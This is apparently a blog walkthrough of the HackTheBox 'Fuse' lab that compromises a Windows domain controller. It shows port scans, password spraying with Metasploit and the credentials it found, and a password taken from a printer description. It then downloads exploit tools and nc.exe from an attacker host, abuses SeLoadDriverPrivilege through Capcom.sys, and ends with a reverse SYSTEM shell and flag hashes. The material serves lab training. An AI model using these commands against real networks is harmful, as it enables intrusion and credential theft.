FUSE HACKTHEBOX WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-05 16:07 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating NSE at 16:07
    Completed NSE at 16:07, 0.00s elapsed
    Initiating Ping Scan at 16:07
    Scanning 10.10.10.193 [4 ports]
    Completed Ping Scan at 16:07, 0.70s elapsed (1 total hosts)
    Initiating SYN Stealth Scan at 16:07
    Scanning fuse.fabricorp.local (10.10.10.193) [1000 ports]
    Discovered open port 139/tcp on 10.10.10.193
    Discovered open port 135/tcp on 10.10.10.193
    Discovered open port 445/tcp on 10.10.10.193
    Discovered open port 53/tcp on 10.10.10.193
    Discovered open port 80/tcp on 10.10.10.193
    Discovered open port 3268/tcp on 10.10.10.193
    Discovered open port 464/tcp on 10.10.10.193
    Discovered open port 3269/tcp on 10.10.10.193
    Discovered open port 636/tcp on 10.10.10.193
    Discovered open port 593/tcp on 10.10.10.193
    Discovered open port 389/tcp on 10.10.10.193
    Discovered open port 88/tcp on 10.10.10.193
    Completed SYN Stealth Scan at 16:07, 27.82s elapsed (1000 total ports)
    Initiating Service scan at 16:07
    Scanning 12 services on fuse.fabricorp.local (10.10.10.193)
    Completed Service scan at 16:10, 158.15s elapsed (12 services on 1 host)
    Initiating OS detection (try #1) against fuse.fabricorp.local (10.10.10.193)
    Retrying OS detection (try #2) against fuse.fabricorp.local (10.10.10.193)
    Initiating Traceroute at 16:10
    Completed Traceroute at 16:10, 0.73s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 16:10
    Completed Parallel DNS resolution of 2 hosts. at 16:10, 0.80s elapsed
    NSE: Script scanning 10.10.10.193.
    Initiating NSE at 16:10
    Completed NSE at 16:11, 40.20s elapsed
    Initiating NSE at 16:11
    Completed NSE at 16:13, 122.25s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Nmap scan report for fuse.fabricorp.local (10.10.10.193)
    Host is up (0.53s latency).
    Not shown: 988 filtered ports
    PORT     STATE SERVICE      VERSION
    53/tcp   open  domain?
    | fingerprint-strings: 
    |   DNSVersionBindReqTCP: 
    |     version
    |_    bind
    80/tcp   open  http         Microsoft IIS httpd 10.0
    | http-methods: 
    |   Supported Methods: OPTIONS TRACE GET HEAD POST
    |_  Potentially risky methods: TRACE
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: Site doesn't have a title (text/html).
    88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-05 10:55:57Z)
    135/tcp  open  msrpc        Microsoft Windows RPC
    139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
    389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
    464/tcp  open  kpasswd5?
    593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
    636/tcp  open  tcpwrapped
    3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
    3269/tcp open  tcpwrapped
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port53-TCP:V=7.80%I=7%D=7/5%Time=5F01AD7A%P=x86_64-pc-linux-gnu%r(DNSVe
    SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
    SF:04bind\0\0\x10\0\x03");
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running (JUST GUESSING): Microsoft Windows 2016|2012|2008 (91%)
    OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_server_2008:r2
    Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2008 R2 (85%)
    No exact OS matches for host (test conditions non-ideal).
    Uptime guess: 0.006 days (since Sun Jul  5 16:03:58 2020)
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=257 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 2h38m16s, deviation: 4h02m32s, median: 18m14s
    | smb-os-discovery: 
    |   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
    |   Computer name: Fuse
    |   NetBIOS computer name: FUSE\x00
    |   Domain name: fabricorp.local
    |   Forest name: fabricorp.local
    |   FQDN: Fuse.fabricorp.local
    |_  System time: 2020-07-05T03:58:42-07:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: required
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled and required
    | smb2-time: 
    |   date: 2020-07-05T10:58:38
    |_  start_date: 2020-07-05T10:52:38

    TRACEROUTE (using port 139/tcp)
    HOP RTT       ADDRESS
    1   711.90 ms 10.10.14.1
    2   711.85 ms fuse.fabricorp.local (10.10.10.193)

    NSE: Script Post-scanning.
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Initiating NSE at 16:13
    Completed NSE at 16:13, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 358.44 seconds
            Raw packets sent: 2089 (95.600KB) | Rcvd: 56 (3.168KB)

ENUMERATION

PORT 80 :

Here we have go only website and some usernames in it.

So lets make wordlist using CEWL

PORT 389 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #ldapsearch -x -h 10.10.10.193 -s sub -b namingcontexts "dc=fuse,dc=htb"
    # extended LDIF
    #
    # LDAPv3
    # base <namingcontexts> with scope subtree
    # filter: dc=fuse,dc=htb
    # requesting: ALL
    #

    # search result
    search: 2
    result: 1 Operations error
    text: 000004DC: LdapErr: DSID-0C090A6C, comment: In order to perform this opera
    tion a successful bind must be completed on the connection., data 0, v3839

    # numResponses: 1

PORT 445 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -L 10.10.10.193
    Enter WORKGROUP\root's password: 
    Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
    SMB1 disabled -- no workgroup available
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U "" -L 10.10.10.193
    Enter WORKGROUP\'s password: 
    session setup failed: NT_STATUS_LOGON_FAILURE

PORT 135 :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U " " 10.10.10.193
    Enter WORKGROUP\ 's password: 
    Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Now we have seen that we cannot get into or use any service unless we have user and pass so lets use the wordlist with users we got from above website:

 msf5 auxiliary(scanner/smb/smb_login) > run

    [*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce

    <--->

    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bnielson:Fabricorp01'

    <--->

    [*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Login SMB :

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 
    session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

Here we need to change password So we will change password for user tlavel and then login with that password but the thing we need to remind is that we should not take time as when we change password we need to login just after it otherwises you may face error!!

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbpasswd -U tlavel -r 10.10.10.193
    Old SMB password:
    New SMB password:
    Retype new SMB password:
    Password changed for user tlavel on 10.10.10.193.
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share 
    SMB1 disabled -- no workgroup available

But in Smbclient we got nothing So we need to use this password somewhere

Remaining ones are rpc and evil-winrm

In case of evil-winrm it didnot work and in case of rpc

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 

    Cannot connect to server.  Error was NT_STATUS_PASSWORD_MUST_CHANGE

Here also we need to change passwd we will do it in same way as for SMB

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #smbpasswd -U tlavel -r 10.10.10.193
    Old SMB password:
    New SMB password:
    Retype new SMB password:
    Password changed for user tlavel on 10.10.10.193.
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #rpcclient -U tlavel -L 10.10.10.193
    Enter WORKGROUP\tlavel's password: 
    rpcclient $> enumdomusers 
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[svc-print] rid:[0x450]
    user:[bnielson] rid:[0x451]
    user:[sthompson] rid:[0x641]
    user:[tlavel] rid:[0x642]
    user:[pmerton] rid:[0x643]
    user:[svc-scan] rid:[0x645]
    user:[bhult] rid:[0x1bbd]
    user:[dandrews] rid:[0x1bbe]
    user:[mberbatov] rid:[0x1db1]
    user:[astein] rid:[0x1db2]
    user:[dmuir] rid:[0x1db3]

Here we see that we have SVC Account . SVC account means service account which could directly link to kerberos also and also could be local users!

So Lets try for Kerberos!!

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #./GetUserSPNs.py -request -dc-ip 10.10.10.193 fabricorp.local/svc-print -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906C1, comment: AcceptSecurityContext error, data 52e, v3839
    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #./GetUserSPNs.py -request -dc-ip 10.10.10.193 fabricorp.local/svc-scan -no-pass
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    [-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906C1, comment: AcceptSecurityContext error, data 52e, v3839

So we need to enumerate more in RPCCLIENT

    rpcclient $> enumprinters 
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]

    rpcclient $> 

Here we got another password which defenitly looks like user password for login !!

LOGIN AND USER ENUMERATION

So we created a wordlist tried usernames for login with passwords we got from above enumeration :

    msf5 auxiliary(scanner/smb/smb_login) > run

    [*] 10.10.10.193:445      - 10.10.10.193:445 - Starting SMB login bruteforce

    <--->

    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:$fab@s3Rv1ce$1',
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\astein:Fabricorp01',
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\bhult:$fab@s3Rv1ce$1',
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-print:$fab@s3Rv1ce$1'
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\svc-scan:$fab@s3Rv1ce$1'
    [-] 10.10.10.193:445      - 10.10.10.193:445 - Failed: '.\tlavel:$fab@s3Rv1ce$1',
    [+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'

    <--->

    [*] 10.10.10.193:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed 

So lets give it a try in EVIL-WINRM

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #evil-winrm  -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
    fabricorp\svc-print
    *Evil-WinRM* PS C:\Users\svc-print\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
    6029348aa869b0b0331d5087ee78b79b
    *Evil-WinRM* PS C:\Users\svc-print\Desktop> 

Its time for Privilege Escalation

    *Evil-WinRM* PS C:\Users\svc-print\Desktop> whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                    State
    ============================= ============================== =======
    SeMachineAccountPrivilege     Add workstations to domain     Enabled
    SeLoadDriverPrivilege         Load and unload device drivers Enabled
    SeShutdownPrivilege           Shut down the system           Enabled
    SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
    SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Here only thing which looks suspicious is <kbd>LOAD AND UNLOAD DRIVERS</kbd>

When I searched for it their was privilege escalation method which could help for <kbd>ADMINISTRATOR</kbd> access.

GETTING ROOT ACCESS

Here we have a way to escalate now we need to know how so lets get some info :

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

https://github.com/Manangoel98/SELOADDRIVER-EXPLOIT

So make Temp directory in c:\ Folder

    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/EOPLOADDRIVER.exe -OutFile EOPLOADDRIVER.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/exploitcapcom.exe -OutFile exploitcapcom.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/liquid.bat -OutFile liquid.bat
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/nc.exe -OutFile nc.exe
    *Evil-WinRM* PS C:\Temp> invoke-webrequest -Uri http://10.10.14.12/Capcom.sys -OutFile Capcom.sys

After getting every file on you machine Just run these commands and remember to open a netcat listener on your attacker machine

VICTIM MACHINE

    *Evil-WinRM* PS C:\Temp> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\capcom.sys
    [+] Enabling SeLoadDriverPrivilege
    [+] SeLoadDriverPrivilege Enabled
    [+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
    NTSTATUS: 00000000, WinError: 0
    *Evil-WinRM* PS C:\Temp> .\exploitcapcom.exe liquid.bat
    [*] Capcom.sys exploit
    [*] Capcom.sys handle was obtained as 0000000000000080
    [*] Shellcode was placed at 00000298BA140008
    [+] Shellcode was executed
    [+] Token stealing was successful
    [+] The SYSTEM shell was launched
    [*] Press any key to exit this program

ATTACKER MACHINE

    ┌─[root@liquid]─[~/Desktop/HTB/fuse]
    └──╼ #nc -lnvp 9005
    listening on [any] 9005 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.193] 50594
    Microsoft Windows [Version 10.0.14393]
    (c) 2016 Microsoft Corporation. All rights reserved.

    C:\Temp>whoami
    whoami
    nt authority\system

    C:\Temp>cd ../Users/Administrator/Desktop
    cd ../Users/Administrator/Desktop

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    61a36b85339ea1ba67fa7e3f55f3a9a6

    C:\Users\Administrator\Desktop>

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: